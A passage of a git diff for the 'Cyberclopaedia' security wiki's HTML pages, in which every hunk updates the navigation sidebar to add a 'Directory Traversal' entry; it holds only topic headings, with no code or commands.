      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -265,22 +265,6 @@

Dis - - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Authentication Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Authentication Frames.html index 6bdf9292..44ed20d0 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Authentication Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Authentication Frames.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -201,22 +201,6 @@

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Discovery Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Discovery Frames.html index 069e3b74..802a9e82 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Discovery Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Discovery Frames.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -312,22 +312,6 @@

Pro - - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/index.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/index.html index db5e5b9c..8f58652b 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/index.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
